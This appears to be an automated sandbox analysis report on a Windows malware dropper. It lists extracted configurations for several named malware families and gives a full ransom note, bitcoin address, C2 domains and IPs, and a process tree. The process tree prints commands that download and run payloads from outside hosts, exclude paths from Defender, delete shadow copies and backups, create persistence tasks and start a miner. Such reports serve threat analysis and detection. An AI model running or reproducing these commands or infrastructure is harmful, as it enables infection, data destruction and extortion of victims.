Analysis

  • max time kernel
    155s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    29-08-2021 21:23

General

  • Target

    a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe

  • Size

    213KB

  • MD5

    90a28a6ee672ff5a010a13a9817434e9

  • SHA1

    ffe3910a3edfe90fa9c2060ab0d414405f0dbc64

  • SHA256

    a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e

  • SHA512

    dd885ecd9e3f79320e8dc6f27640a02b9a332c1442d40a4ffc6bda40d148a349508ef31fa210b00ba024bffb6308a1180064e88bd18622edcf19cc964423e229

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.zippyshare.cc/1630257393/download

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.zippyshare.cc/1630257468/download

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.zippyshare.cc/1630258463/download

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 590$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 8F1-9A6-E57 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

nn

C2

135.181.49.56:47634

Extracted

Family

raccoon

Botnet

d02c5d65069fc7ce1993e7c52edf0c9c4c195c81

Attributes
  • url4cnc

    https://telete.in/open3entershift

rc4.plain
rc4.plain

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 3 IoCs
  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 20 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Obfuscated with Agile.Net obfuscator 3 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe
    "C:\Users\Admin\AppData\Local\Temp\a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Users\Admin\AppData\Local\Temp\a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe
      "C:\Users\Admin\AppData\Local\Temp\a1f73897432a3cb7559a016f505af13e62d86ff44a9b84fcbcf7c5d99434196e.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2376
  • C:\Users\Admin\AppData\Local\Temp\C2F8.exe
    C:\Users\Admin\AppData\Local\Temp\C2F8.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:3712
  • C:\Users\Admin\AppData\Local\Temp\C5C7.exe
    C:\Users\Admin\AppData\Local\Temp\C5C7.exe
    1⤵
    • Executes dropped EXE
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2080
    • C:\Users\Admin\AppData\Local\Temp\dafe6642-235b-4be3-8ed3-95c204b55171\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\dafe6642-235b-4be3-8ed3-95c204b55171\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\dafe6642-235b-4be3-8ed3-95c204b55171\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      2⤵
        PID:1084
        • C:\Users\Admin\AppData\Local\Temp\dafe6642-235b-4be3-8ed3-95c204b55171\AdvancedRun.exe
          "C:\Users\Admin\AppData\Local\Temp\dafe6642-235b-4be3-8ed3-95c204b55171\AdvancedRun.exe" /SpecialRun 4101d8 1084
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2300
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\C5C7.exe" -Force
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2348
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3060
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\C5C7.exe" -Force
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3940
    • C:\Users\Admin\AppData\Local\Temp\C6E2.exe
      C:\Users\Admin\AppData\Local\Temp\C6E2.exe
      1⤵
      • Executes dropped EXE
      PID:3852
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 736
        2⤵
        • Drops file in Windows directory
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4960
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 748
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:5080
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 852
        2⤵
        • Program crash
        PID:4172
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 876
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4300
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1188
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:2712
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 1244
        2⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:4788
    • C:\Users\Admin\AppData\Local\Temp\C906.exe
      C:\Users\Admin\AppData\Local\Temp\C906.exe
      1⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies system certificate store
      PID:2924
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
        2⤵
        • Executes dropped EXE
        • Enumerates connected drives
        PID:4484
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
          3⤵
            PID:4176
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic shadowcopy delete
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1368
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4172
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
            3⤵
              PID:4348
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
              3⤵
                PID:1524
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                3⤵
                  PID:4464
                  • C:\Windows\SysWOW64\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:4124
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
                  3⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  PID:2280
            • C:\Users\Admin\AppData\Local\Temp\D105.exe
              C:\Users\Admin\AppData\Local\Temp\D105.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2504
            • C:\Users\Admin\AppData\Local\Temp\D414.exe
              C:\Users\Admin\AppData\Local\Temp\D414.exe
              1⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2724
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257393/download', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257468/download', '%Temp%\\WindowsAPI.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630258463/download', '%Temp%\\svhost.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsAPI.exe' & powershell Start-Process -FilePath '%Temp%\\svhost.exe' & exit
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2948
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257393/download', 'C:\Users\Admin\AppData\Local\Temp\\WindowsHost.exe')
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1356
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630257468/download', 'C:\Users\Admin\AppData\Local\Temp\\WindowsAPI.exe')
                  3⤵
                  • Blocklisted process makes network request
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4208
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell (New-Object System.Net.WebClient).DownloadFile('https://www.zippyshare.cc/1630258463/download', 'C:\Users\Admin\AppData\Local\Temp\\svhost.exe')
                  3⤵
                  • Blocklisted process makes network request
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3512
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\WindowsHost.exe'
                  3⤵
                    PID:4756
                    • C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe
                      "C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"
                      4⤵
                      • Executes dropped EXE
                      PID:4480
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"' & exit
                        5⤵
                          PID:668
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"'
                            6⤵
                            • Creates scheduled task(s)
                            PID:784
                        • C:\Users\Admin\AppData\Roaming\SafeWindows.exe
                          "C:\Users\Admin\AppData\Roaming\SafeWindows.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2564
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"' & exit
                            6⤵
                              PID:4940
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /tn "SafeWindows" /tr '"C:\Users\Admin\AppData\Roaming\SafeWindows.exe"'
                                7⤵
                                • Creates scheduled task(s)
                                PID:2016
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:2096
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=info.displaypluginwatchdog.xyz --user=43x1GMVXBpY6gd46aqN5VCTYWDmZjYk2zVYZVYb4zvBpCuAMcocaackDDL5wirHTQwbZoAGmLjB9H2wuBhKFVVdJLDmb8Fe --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
                              6⤵
                                PID:5116
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\WindowsAPI.exe'
                          3⤵
                            PID:4772
                            • C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe
                              "C:\Users\Admin\AppData\Local\Temp\WindowsAPI.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:4312
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"' & exit
                                5⤵
                                  PID:5076
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc onlogon /rl highest /tn "DriverVideocard" /tr '"C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"'
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:2308
                                • C:\Users\Admin\AppData\Roaming\DriverVideocard.exe
                                  "C:\Users\Admin\AppData\Roaming\DriverVideocard.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2836
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\svhost.exe'
                              3⤵
                                PID:5036
                                • C:\Users\Admin\AppData\Local\Temp\svhost.exe
                                  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2844
                                  • C:\Users\Admin\AppData\Local\Temp\svhost.exe
                                    "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2524
                          • C:\Users\Admin\AppData\Local\Temp\D618.exe
                            C:\Users\Admin\AppData\Local\Temp\D618.exe
                            1⤵
                            • Modifies WinLogon for persistence
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Modifies registry class
                            PID:1064
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Wxqzckqsqcvglaedzdxnjkt.vbs"
                              2⤵
                                PID:2848
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Twitch\TwitchUpdate.exe'
                                  3⤵
                                    PID:2584
                                • C:\Users\Admin\AppData\Local\Temp\D618.exe
                                  C:\Users\Admin\AppData\Local\Temp\D618.exe
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3656
                                  • C:\Users\Admin\AppData\Local\Temp\D618.exe
                                    "C:\Users\Admin\AppData\Local\Temp\D618.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2976
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:1836
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                    PID:2304
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:3620
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of WriteProcessMemory
                                      PID:1084
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      1⤵
                                        PID:4232
                                      • C:\Windows\explorer.exe
                                        C:\Windows\explorer.exe
                                        1⤵
                                          PID:4376
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:4496
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                              PID:4660
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              1⤵
                                                PID:4804
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                  PID:4516
                                                • C:\Windows\system32\vssvc.exe
                                                  C:\Windows\system32\vssvc.exe
                                                  1⤵
                                                    PID:4132

                                                  Network

                                                  MITRE ATT&CK Enterprise v6

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

                                                    MD5

                                                    5703edef7cb0f99305a6b18845e0443e

                                                    SHA1

                                                    fb6f022ebde210306e1a6575462d6451e98af454

                                                    SHA256

                                                    e4ce02059eb175c30879041d610db7b8798cdf57a4c67afc83c125c2db36e883

                                                    SHA512

                                                    4631853bda1498ff3cace6a348fd2d6770edd0fec166707c3afebff09644f34e29a7a6dd3e9cb167c40e8b5fa1fbbc80ba26d80b4d939daf56278c276b07ada4

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

                                                    MD5

                                                    888f7457c332ac5e1897316e159f58c1

                                                    SHA1

                                                    a3047c6e978158dfae29b5735e8131ec1b30703d

                                                    SHA256

                                                    c2c14652875bfeb1ed529202da6d45eb974acab193c005908cf90b8c5cf3dd41

                                                    SHA512

                                                    0abdc5f78ade2f56b0f1954adc0479b5dcc88d401bfac95754e7dd80adefe7375a426fd89f81b657ebe9c113092524dcbd1e80c39a4bec51ccd93bc0bc3a5aff

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                    MD5

                                                    939460925953ce88e1086341b8a11bda

                                                    SHA1

                                                    06249b891050a9fac128ccfee943aeb5bede1c7b

                                                    SHA256

                                                    d4da3c5ff04a3b677eb77b1bfedc14e29ebd0d01c476d44a0b1a2366447ab016

                                                    SHA512

                                                    a8dc3eb58a4a550cc2551463a3d813396caf3f2b65f5b13c8e339a4a32652895ee15c23eb5ba833eca4e7c22331a622657cf5bd64098f0c54e43b4e92fe65f30

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB

                                                    MD5

                                                    3b541f5a9a1055a256aaca6219371646

                                                    SHA1

                                                    352a67ea89ca2fe7db3d2249ce023dddb9e302a9

                                                    SHA256

                                                    75d9a1fa081bec9e5cdab6b4f8f0798fb67a9792c73e36f5b18448e4268127b9

                                                    SHA512

                                                    ff70da818a97942738ba3014459a1d6fff97b9a37e8316dbedae2ce41f288ae35602c775894b8bb5edf665a220e110c80847242230df84e4cfc6bb341f091c81

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE

                                                    MD5

                                                    46ff1f8298caea28be5fb216890cd79d

                                                    SHA1

                                                    afe1a820013dcb2200fb47bf792e73a3f499e8f4

                                                    SHA256

                                                    0c6368d3a41702831dc3f65b1057ab975ef3f53b033d5ecf99f2dd55fd29b0cd

                                                    SHA512

                                                    4a5eafb13ebd37b6b49ecb923d87a29bd0845885999cdbef43a428d8c468fa09032f2afd01ffbd938c0b7f0dfc48ada90d1cab14bde5989fa9253e93e7c7c74b

                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                                                    MD5

                                                    c150362e456a3f6391c62091b1a41a07

                                                    SHA1

                                                    c28ad90696b4b328e300f6ad0431593f9685ea7d

                                                    SHA256

                                                    ffe5644e0b87ad18d4d4547d8211fb6b1c16eb5b51001c520b9a872d30eba646

                                                    SHA512

                                                    e3f2017ab09af23065fdbb0c2046e774749b457dadc7713970ee0a3bd8cd1c80f0103f73d100d6e9c8565bcc62532e38c5bfa0c2b0b0bcf80d0eed1881b89dcc

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\D618.exe.log

                                                    MD5

                                                    7a67bf079fc4538c83e05c4c8d8fabd7

                                                    SHA1

                                                    6fed3c6bcb8a0a132818108fd92a2d2b9e9db464

                                                    SHA256

                                                    f47660253cb61730ed0dd7161e85a4dcc598ea38c9a8ddcbed4c5dd779dfc112

                                                    SHA512

                                                    e13f5530eb7fde87fc70091e6e51af4f67cc863998059308ce28e693017fce9332fe5d3d90c29efee5fb0616f4f07915d071579c8b7a43c2467e37f5afbbdf24

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                    MD5

                                                    42d4b1d78e6e092af15c7aef34e5cf45

                                                    SHA1

                                                    6cf9d0e674430680f67260194d3185667a2bb77b

                                                    SHA256

                                                    c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

                                                    SHA512

                                                    d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                    MD5

                                                    1c19c16e21c97ed42d5beabc93391fc5

                                                    SHA1

                                                    8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

                                                    SHA256

                                                    1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

                                                    SHA512

                                                    7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svhost.exe.log

                                                    MD5

                                                    b4f7a6a57cb46d94b72410eb6a6d45a9

                                                    SHA1

                                                    69f3596ffa027202d391444b769ceea0ae14c5f7

                                                    SHA256

                                                    23994ebe221a48ea16ebad51ae0d4b47ccd415ae10581f9405e588d4f6c2523b

                                                    SHA512

                                                    be6da516e54c3a5b33ac2603137a2f8cf8445ff5961dd266faedf3627bae8979953d7ef305538df0151c609917a5b99bf5d023bdd32de50fd5c723950f90db5c

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\9Y2U4I40.htm

                                                    MD5

                                                    b1cd7c031debba3a5c77b39b6791c1a7

                                                    SHA1

                                                    e5d91e14e9c685b06f00e550d9e189deb2075f76

                                                    SHA256

                                                    57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

                                                    SHA512

                                                    d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    MD5

                                                    0b5d94d20be9eecbaed3dddd04143f07

                                                    SHA1

                                                    c677d0355f4cc7301075a554adc889bce502e15a

                                                    SHA256

                                                    3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

                                                    SHA512

                                                    395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    MD5

                                                    fba544f9fefd0d36ce89d4fb69d0ca21

                                                    SHA1

                                                    99be5dc5a8588a9cbe4e6f15caf73b86fb5c7f63

                                                    SHA256

                                                    3328bf2022f78f1c930cca9ac1a4d183bbff8ff07f44d394d1015ecfff145765

                                                    SHA512

                                                    d94de024f47fc2608edc1612f015ecc7572c50278afe14795b8e873dd3c9f83e499a8541ea929fd9355f40675f948a3f704ca89184014455fed50aa2d87703ba

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    MD5

                                                    f4dd280dcceedeefcd91f2665cdcd9a2

                                                    SHA1

                                                    bc1fedc3f78a1f884f4cb03ea64a0376b4f911e2

                                                    SHA256

                                                    263a81f9ad8ee618262117b89d566ac992572894cc26c4eb678f486c9fee5ea0

                                                    SHA512

                                                    83c0d1a0fbe6157a146cbfd5a3ed2680a18e8b7baca06a8e836d019a0c8f166cea39ab2cfc0903a735e882a45695502383933e1005cbf62f8dd6531625e883c6

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

